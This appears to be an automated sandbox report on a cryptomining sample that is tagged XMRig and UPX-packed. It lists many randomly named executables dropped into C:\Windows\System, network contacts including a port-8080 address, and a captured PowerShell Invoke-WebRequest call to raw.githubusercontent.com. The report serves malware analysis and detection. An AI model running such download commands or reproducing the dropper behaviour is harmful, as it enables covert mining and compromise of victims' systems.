
C:\Windows\System\tLKjmHP.exe

C:\Windows\System\tLKjmHP.exe

C:\Windows\System\aDJuVYs.exe

C:\Windows\System\aDJuVYs.exe

C:\Windows\System\xSkhdSQ.exe

C:\Windows\System\xSkhdSQ.exe

C:\Windows\System\WwzCnol.exe

C:\Windows\System\WwzCnol.exe

C:\Windows\System\MeiTjRM.exe

C:\Windows\System\MeiTjRM.exe

C:\Windows\System\cOVcfKS.exe

C:\Windows\System\cOVcfKS.exe

C:\Windows\System\XCHwRVi.exe

C:\Windows\System\XCHwRVi.exe

C:\Windows\System\LMWAPAH.exe

C:\Windows\System\LMWAPAH.exe

C:\Windows\System\FogkFDy.exe

C:\Windows\System\FogkFDy.exe

C:\Windows\System\oVoctHa.exe

C:\Windows\System\oVoctHa.exe

C:\Windows\System\mkUrFBt.exe

C:\Windows\System\mkUrFBt.exe

C:\Windows\System\DlvOWFI.exe

C:\Windows\System\DlvOWFI.exe

C:\Windows\System\crHDpcm.exe

C:\Windows\System\crHDpcm.exe

C:\Windows\System\PtzSJPc.exe

C:\Windows\System\PtzSJPc.exe

C:\Windows\System\LUsrvie.exe

C:\Windows\System\LUsrvie.exe

C:\Windows\System\rAryBrJ.exe

C:\Windows\System\rAryBrJ.exe

C:\Windows\System\IEKFfQy.exe

C:\Windows\System\IEKFfQy.exe

C:\Windows\System\zsbfVvj.exe

C:\Windows\System\zsbfVvj.exe

C:\Windows\System\oeDJzDl.exe

C:\Windows\System\oeDJzDl.exe

C:\Windows\System\xPVgNNv.exe

C:\Windows\System\xPVgNNv.exe

C:\Windows\System\XfDHViA.exe

C:\Windows\System\XfDHViA.exe

C:\Windows\System\SxWZxfG.exe

C:\Windows\System\SxWZxfG.exe

C:\Windows\System\sadQKwc.exe

C:\Windows\System\sadQKwc.exe

C:\Windows\System\vwglDDd.exe

C:\Windows\System\vwglDDd.exe

C:\Windows\System\IDCzSHN.exe

C:\Windows\System\IDCzSHN.exe

C:\Windows\System\zZnFCuV.exe

C:\Windows\System\zZnFCuV.exe

C:\Windows\System\bVieIBw.exe

C:\Windows\System\bVieIBw.exe

C:\Windows\System\ypfZsDh.exe

C:\Windows\System\ypfZsDh.exe

C:\Windows\System\yEeEUOl.exe

C:\Windows\System\yEeEUOl.exe

C:\Windows\System\ocCJBoy.exe

C:\Windows\System\ocCJBoy.exe

C:\Windows\System\uWpJgxv.exe

C:\Windows\System\uWpJgxv.exe

C:\Windows\System\DeBDsfE.exe

C:\Windows\System\DeBDsfE.exe

C:\Windows\System\WjrhVBG.exe

C:\Windows\System\WjrhVBG.exe

C:\Windows\System\bFnXsDY.exe

C:\Windows\System\bFnXsDY.exe

C:\Windows\System\bsGEaZR.exe

C:\Windows\System\bsGEaZR.exe

C:\Windows\System\SpqNZpV.exe

C:\Windows\System\SpqNZpV.exe

C:\Windows\System\kferxKF.exe

C:\Windows\System\kferxKF.exe

C:\Windows\System\eNUpwQt.exe

C:\Windows\System\eNUpwQt.exe

C:\Windows\System\CzlJBVw.exe

C:\Windows\System\CzlJBVw.exe

C:\Windows\System\fqBXjYC.exe

C:\Windows\System\fqBXjYC.exe

C:\Windows\System\UJZlzMv.exe

C:\Windows\System\UJZlzMv.exe

C:\Windows\System\wGiwGlu.exe

C:\Windows\System\wGiwGlu.exe

C:\Windows\System\uNyXYhY.exe

C:\Windows\System\uNyXYhY.exe

C:\Windows\System\vXwuaFK.exe

C:\Windows\System\vXwuaFK.exe

C:\Windows\System\JBRDNGY.exe

C:\Windows\System\JBRDNGY.exe

C:\Windows\System\PSbYhNL.exe

C:\Windows\System\PSbYhNL.exe

C:\Windows\System\NABdbGF.exe

C:\Windows\System\NABdbGF.exe

C:\Windows\System\wYcUQJl.exe

C:\Windows\System\wYcUQJl.exe

C:\Windows\System\YtAzyEt.exe

C:\Windows\System\YtAzyEt.exe

C:\Windows\System\jDTMcHd.exe

C:\Windows\System\jDTMcHd.exe

C:\Windows\System\aGbDwqH.exe

C:\Windows\System\aGbDwqH.exe

C:\Windows\System\qXAsOxO.exe

C:\Windows\System\qXAsOxO.exe

C:\Windows\System\iOsVkZa.exe

C:\Windows\System\iOsVkZa.exe

C:\Windows\System\lVAfhNs.exe

C:\Windows\System\lVAfhNs.exe

C:\Windows\System\wRQcceN.exe

C:\Windows\System\wRQcceN.exe

C:\Windows\System\VsKBiFN.exe

C:\Windows\System\VsKBiFN.exe

C:\Windows\System\GQEWkTH.exe

C:\Windows\System\GQEWkTH.exe

C:\Windows\System\sOSOydV.exe

C:\Windows\System\sOSOydV.exe

C:\Windows\System\RoQhjaW.exe

C:\Windows\System\RoQhjaW.exe

C:\Windows\System\GJhpUSU.exe

C:\Windows\System\GJhpUSU.exe

C:\Windows\System\VwGRmOR.exe

C:\Windows\System\VwGRmOR.exe

C:\Windows\System\CUOTolJ.exe

C:\Windows\System\CUOTolJ.exe

C:\Windows\System\QbOfziH.exe

C:\Windows\System\QbOfziH.exe

C:\Windows\System\iCUcWxB.exe

C:\Windows\System\iCUcWxB.exe

C:\Windows\System\cSGiwuF.exe

C:\Windows\System\cSGiwuF.exe

C:\Windows\System\aJQJosk.exe

C:\Windows\System\aJQJosk.exe

C:\Windows\System\VlxKySG.exe

C:\Windows\System\VlxKySG.exe

C:\Windows\System\IPQxcHd.exe

C:\Windows\System\IPQxcHd.exe

C:\Windows\System\nsDqmHe.exe

C:\Windows\System\nsDqmHe.exe

C:\Windows\System\fOKafIH.exe

C:\Windows\System\fOKafIH.exe

C:\Windows\System\gOtkWkl.exe

C:\Windows\System\gOtkWkl.exe

C:\Windows\System\SLcQIDb.exe

C:\Windows\System\SLcQIDb.exe

C:\Windows\System\kgXEoEP.exe

C:\Windows\System\kgXEoEP.exe

C:\Windows\System\jRwPtuH.exe

C:\Windows\System\jRwPtuH.exe

C:\Windows\System\sCauccz.exe

C:\Windows\System\sCauccz.exe

C:\Windows\System\NoGxKVh.exe

C:\Windows\System\NoGxKVh.exe

C:\Windows\System\KGuJBrx.exe

C:\Windows\System\KGuJBrx.exe

C:\Windows\System\HulkkJV.exe

C:\Windows\System\HulkkJV.exe

C:\Windows\System\NIoIdpz.exe

C:\Windows\System\NIoIdpz.exe

C:\Windows\System\PiDbvGi.exe

C:\Windows\System\PiDbvGi.exe

C:\Windows\System\cleKUuL.exe

C:\Windows\System\cleKUuL.exe

C:\Windows\System\KFIYSDG.exe

C:\Windows\System\KFIYSDG.exe

C:\Windows\System\OhmBDbD.exe

C:\Windows\System\OhmBDbD.exe

C:\Windows\System\IVUduUT.exe

C:\Windows\System\IVUduUT.exe

C:\Windows\System\EUDkNHN.exe

C:\Windows\System\EUDkNHN.exe

C:\Windows\System\KAzINra.exe

C:\Windows\System\KAzINra.exe

C:\Windows\System\tJGGYqd.exe

C:\Windows\System\tJGGYqd.exe

C:\Windows\System\JppqsoR.exe

C:\Windows\System\JppqsoR.exe

C:\Windows\System\vtFwvNd.exe

C:\Windows\System\vtFwvNd.exe

C:\Windows\System\WxLjJhF.exe

C:\Windows\System\WxLjJhF.exe

C:\Windows\System\fzDdfFf.exe

C:\Windows\System\fzDdfFf.exe

C:\Windows\System\JfuyiWp.exe

C:\Windows\System\JfuyiWp.exe

C:\Windows\System\SBEDQfh.exe

C:\Windows\System\SBEDQfh.exe

C:\Windows\System\iodREHM.exe

C:\Windows\System\iodREHM.exe

C:\Windows\System\ouFoRcL.exe

C:\Windows\System\ouFoRcL.exe

C:\Windows\System\QFzAGrx.exe

C:\Windows\System\QFzAGrx.exe

C:\Windows\System\IdGxrsx.exe

C:\Windows\System\IdGxrsx.exe

C:\Windows\System\juaUxsa.exe

C:\Windows\System\juaUxsa.exe

C:\Windows\System\MsVlQDW.exe

C:\Windows\System\MsVlQDW.exe

C:\Windows\System\IkNvQCb.exe

C:\Windows\System\IkNvQCb.exe

C:\Windows\System\ytMUxsh.exe

C:\Windows\System\ytMUxsh.exe

C:\Windows\System\kYsfwNv.exe

C:\Windows\System\kYsfwNv.exe

C:\Windows\System\AXTffBQ.exe

C:\Windows\System\AXTffBQ.exe

C:\Windows\System\RoGHrRZ.exe

C:\Windows\System\RoGHrRZ.exe

C:\Windows\System\QKSFwbK.exe

C:\Windows\System\QKSFwbK.exe

C:\Windows\System\ZUQohej.exe

C:\Windows\System\ZUQohej.exe

C:\Windows\System\XyTAXsW.exe

C:\Windows\System\XyTAXsW.exe

C:\Windows\System\hlmOykn.exe

C:\Windows\System\hlmOykn.exe

C:\Windows\System\iGmBnnk.exe

C:\Windows\System\iGmBnnk.exe

C:\Windows\System\gIvdClX.exe

C:\Windows\System\gIvdClX.exe

C:\Windows\System\FiXdhDC.exe

C:\Windows\System\FiXdhDC.exe

C:\Windows\System\EGpfvpU.exe

C:\Windows\System\EGpfvpU.exe

C:\Windows\System\HVkFPOo.exe

C:\Windows\System\HVkFPOo.exe

C:\Windows\System\ObucyzN.exe

C:\Windows\System\ObucyzN.exe

C:\Windows\System\JxgnHJU.exe

C:\Windows\System\JxgnHJU.exe

C:\Windows\System\CuZgtml.exe

C:\Windows\System\CuZgtml.exe

C:\Windows\System\IbcouLg.exe

C:\Windows\System\IbcouLg.exe

C:\Windows\System\QWlYwRM.exe

C:\Windows\System\QWlYwRM.exe

C:\Windows\System\NleUTVj.exe

C:\Windows\System\NleUTVj.exe

C:\Windows\System\dThbXNh.exe

C:\Windows\System\dThbXNh.exe

C:\Windows\System\WCdijYF.exe

C:\Windows\System\WCdijYF.exe

C:\Windows\System\ZMBgrjd.exe

C:\Windows\System\ZMBgrjd.exe

C:\Windows\System\cdJFauC.exe

C:\Windows\System\cdJFauC.exe

C:\Windows\System\kKcHzJI.exe

C:\Windows\System\kKcHzJI.exe

C:\Windows\System\AfasGtp.exe

C:\Windows\System\AfasGtp.exe

C:\Windows\System\FVbXVxZ.exe

C:\Windows\System\FVbXVxZ.exe

C:\Windows\System\ARqSTLy.exe

C:\Windows\System\ARqSTLy.exe

C:\Windows\System\DtTDhqw.exe

C:\Windows\System\DtTDhqw.exe

C:\Windows\System\KWQIKBB.exe

C:\Windows\System\KWQIKBB.exe

C:\Windows\System\vyrtOKU.exe

C:\Windows\System\vyrtOKU.exe

C:\Windows\System\cWCNeCF.exe

C:\Windows\System\cWCNeCF.exe

C:\Windows\System\rLJWBtf.exe

C:\Windows\System\rLJWBtf.exe

C:\Windows\System\taxGnSM.exe

C:\Windows\System\taxGnSM.exe

C:\Windows\System\xPldIAl.exe

C:\Windows\System\xPldIAl.exe

C:\Windows\System\GOYshcc.exe

C:\Windows\System\GOYshcc.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 04:39

Reported

2024-05-27 04:42

Platform

win10v2004-20240508-en

Max time kernel

91s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UMYLiIQ.exe
PID 4844 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UMYLiIQ.exe
PID 4844 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\LwONxde.exe
PID 4844 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\LwONxde.exe
PID 4844 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\rHAvdEG.exe
PID 4844 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\rHAvdEG.exe
PID 4844 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UiRrkAA.exe
PID 4844 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UiRrkAA.exe
PID 4844 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bqdBunV.exe
PID 4844 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bqdBunV.exe
PID 4844 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yCxjQNU.exe
PID 4844 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yCxjQNU.exe
PID 4844 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\veiZvSY.exe
PID 4844 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\veiZvSY.exe
PID 4844 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\xSKtnqe.exe
PID 4844 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\xSKtnqe.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\CcVEjzi.exe

C:\Windows\System\TPWjOKc.exe

C:\Windows\System\TPWjOKc.exe

C:\Windows\System\mpdoQnS.exe

C:\Windows\System\mpdoQnS.exe

C:\Windows\System\LdoFLTa.exe

C:\Windows\System\LdoFLTa.exe

C:\Windows\System\wtoWKBl.exe

C:\Windows\System\wtoWKBl.exe

C:\Windows\System\dGMuZvQ.exe

C:\Windows\System\dGMuZvQ.exe

C:\Windows\System\plCwyjV.exe

C:\Windows\System\plCwyjV.exe

C:\Windows\System\yKOysVJ.exe

C:\Windows\System\yKOysVJ.exe

C:\Windows\System\eyURSVX.exe

C:\Windows\System\eyURSVX.exe

C:\Windows\System\qsEiWuS.exe

C:\Windows\System\qsEiWuS.exe

C:\Windows\System\hDootNg.exe

C:\Windows\System\hDootNg.exe

C:\Windows\System\bYhlzzf.exe

C:\Windows\System\bYhlzzf.exe

C:\Windows\System\aNlanOx.exe

C:\Windows\System\aNlanOx.exe

C:\Windows\System\MnLFUfu.exe

C:\Windows\System\MnLFUfu.exe

C:\Windows\System\iNfvUUa.exe

C:\Windows\System\iNfvUUa.exe

C:\Windows\System\kjUXJwf.exe

C:\Windows\System\kjUXJwf.exe

C:\Windows\System\bDJyoVQ.exe

C:\Windows\System\bDJyoVQ.exe

C:\Windows\System\MwsygsW.exe

C:\Windows\System\MwsygsW.exe

C:\Windows\System\ewUkmJa.exe

C:\Windows\System\ewUkmJa.exe

C:\Windows\System\xBxMbQQ.exe

C:\Windows\System\xBxMbQQ.exe

C:\Windows\System\SioXuAY.exe

C:\Windows\System\SioXuAY.exe

C:\Windows\System\KloiLOd.exe

C:\Windows\System\KloiLOd.exe

C:\Windows\System\iYJxlHO.exe

C:\Windows\System\iYJxlHO.exe

C:\Windows\System\RxPeyVF.exe

C:\Windows\System\RxPeyVF.exe

C:\Windows\System\owpXnUh.exe

C:\Windows\System\owpXnUh.exe

C:\Windows\System\JYpCVNd.exe

C:\Windows\System\JYpCVNd.exe

C:\Windows\System\YDJbxFm.exe

C:\Windows\System\YDJbxFm.exe

C:\Windows\System\mTNBkvE.exe

C:\Windows\System\mTNBkvE.exe

C:\Windows\System\MgLaxNI.exe

C:\Windows\System\MgLaxNI.exe

C:\Windows\System\jpHGLMG.exe

C:\Windows\System\jpHGLMG.exe

C:\Windows\System\qlvhlTT.exe

C:\Windows\System\qlvhlTT.exe

C:\Windows\System\MlyCoKk.exe

C:\Windows\System\MlyCoKk.exe

C:\Windows\System\YTldnVo.exe

C:\Windows\System\YTldnVo.exe

C:\Windows\System\GkrPOrb.exe

C:\Windows\System\GkrPOrb.exe

C:\Windows\System\oabEYaJ.exe

C:\Windows\System\oabEYaJ.exe

C:\Windows\System\qbXhMwq.exe

C:\Windows\System\qbXhMwq.exe

C:\Windows\System\oOfAUfz.exe

C:\Windows\System\oOfAUfz.exe

C:\Windows\System\NPwcSxK.exe

C:\Windows\System\NPwcSxK.exe

C:\Windows\System\iiUYQgT.exe

C:\Windows\System\iiUYQgT.exe

C:\Windows\System\drcOIlU.exe

C:\Windows\System\drcOIlU.exe

C:\Windows\System\ZnpbPMM.exe

C:\Windows\System\ZnpbPMM.exe

C:\Windows\System\ZIXlnZA.exe

C:\Windows\System\ZIXlnZA.exe

C:\Windows\System\zlpFDQs.exe

C:\Windows\System\zlpFDQs.exe

C:\Windows\System\VKmcrvy.exe

C:\Windows\System\VKmcrvy.exe

C:\Windows\System\FZeYCoV.exe

C:\Windows\System\FZeYCoV.exe

C:\Windows\System\KusAbGQ.exe

C:\Windows\System\KusAbGQ.exe

C:\Windows\System\SxVQebR.exe

C:\Windows\System\SxVQebR.exe

C:\Windows\System\sJGrKjF.exe

C:\Windows\System\sJGrKjF.exe

C:\Windows\System\aKRiMaF.exe

C:\Windows\System\aKRiMaF.exe

C:\Windows\System\LmzMlFr.exe

C:\Windows\System\LmzMlFr.exe

C:\Windows\System\HsjyBkL.exe

C:\Windows\System\HsjyBkL.exe

C:\Windows\System\JoBfBBj.exe

C:\Windows\System\JoBfBBj.exe

C:\Windows\System\jHyJlFL.exe

C:\Windows\System\jHyJlFL.exe

C:\Windows\System\ZQEusee.exe

C:\Windows\System\ZQEusee.exe

C:\Windows\System\iURZCWl.exe

C:\Windows\System\iURZCWl.exe

C:\Windows\System\prDHXON.exe

C:\Windows\System\prDHXON.exe

C:\Windows\System\TIZirJj.exe

C:\Windows\System\TIZirJj.exe

C:\Windows\System\rwqjVPn.exe

C:\Windows\System\rwqjVPn.exe

C:\Windows\System\usMXorK.exe

C:\Windows\System\usMXorK.exe

C:\Windows\System\ppLNhtj.exe

C:\Windows\System\ppLNhtj.exe

C:\Windows\System\NroyRpR.exe

C:\Windows\System\NroyRpR.exe

C:\Windows\System\YwcQhta.exe

C:\Windows\System\YwcQhta.exe

C:\Windows\System\FtjvJOG.exe

C:\Windows\System\FtjvJOG.exe

C:\Windows\System\sxNQAHd.exe

C:\Windows\System\sxNQAHd.exe

C:\Windows\System\kRumxNh.exe

C:\Windows\System\kRumxNh.exe

C:\Windows\System\ODdKoDq.exe

C:\Windows\System\ODdKoDq.exe

C:\Windows\System\PRsIFnz.exe

C:\Windows\System\PRsIFnz.exe

C:\Windows\System\AJdSRPd.exe

C:\Windows\System\AJdSRPd.exe

C:\Windows\System\sxxHxsU.exe

C:\Windows\System\sxxHxsU.exe

C:\Windows\System\xfQgKax.exe

C:\Windows\System\xfQgKax.exe

C:\Windows\System\kIOwoQm.exe

C:\Windows\System\kIOwoQm.exe

C:\Windows\System\ewQGPkJ.exe

C:\Windows\System\ewQGPkJ.exe

C:\Windows\System\DGdQHdF.exe

C:\Windows\System\DGdQHdF.exe

C:\Windows\System\NXhHtOd.exe

C:\Windows\System\NXhHtOd.exe

C:\Windows\System\wKRPUzw.exe

C:\Windows\System\wKRPUzw.exe

C:\Windows\System\XUmmgih.exe

C:\Windows\System\XUmmgih.exe

C:\Windows\System\pIcTlQd.exe

C:\Windows\System\pIcTlQd.exe

C:\Windows\System\xowseuK.exe

C:\Windows\System\xowseuK.exe

C:\Windows\System\qxGmAFI.exe

C:\Windows\System\qxGmAFI.exe

C:\Windows\System\pBmLmCC.exe

C:\Windows\System\pBmLmCC.exe

C:\Windows\System\QIsZRNt.exe

C:\Windows\System\QIsZRNt.exe

C:\Windows\System\qETXegs.exe

C:\Windows\System\qETXegs.exe

C:\Windows\System\CKbYiqK.exe

C:\Windows\System\CKbYiqK.exe

C:\Windows\System\ySlgRej.exe

C:\Windows\System\ySlgRej.exe

C:\Windows\System\ihQVehP.exe

C:\Windows\System\ihQVehP.exe

C:\Windows\System\nZblRia.exe

C:\Windows\System\nZblRia.exe

C:\Windows\System\RbYrnrq.exe

C:\Windows\System\RbYrnrq.exe

C:\Windows\System\EAXRBFt.exe

C:\Windows\System\EAXRBFt.exe

C:\Windows\System\idyMwre.exe

C:\Windows\System\idyMwre.exe

C:\Windows\System\nTMsvuy.exe

C:\Windows\System\nTMsvuy.exe

C:\Windows\System\RCkawGI.exe

C:\Windows\System\RCkawGI.exe

C:\Windows\System\HRGVGdj.exe

C:\Windows\System\HRGVGdj.exe

C:\Windows\System\YXnRtZt.exe

C:\Windows\System\YXnRtZt.exe

C:\Windows\System\bIGBNSV.exe

C:\Windows\System\bIGBNSV.exe

C:\Windows\System\FgISMmz.exe

C:\Windows\System\FgISMmz.exe

C:\Windows\System\mJgshuI.exe

C:\Windows\System\mJgshuI.exe

C:\Windows\System\SdMzVxO.exe

C:\Windows\System\SdMzVxO.exe

C:\Windows\System\bvHJncj.exe

C:\Windows\System\bvHJncj.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files
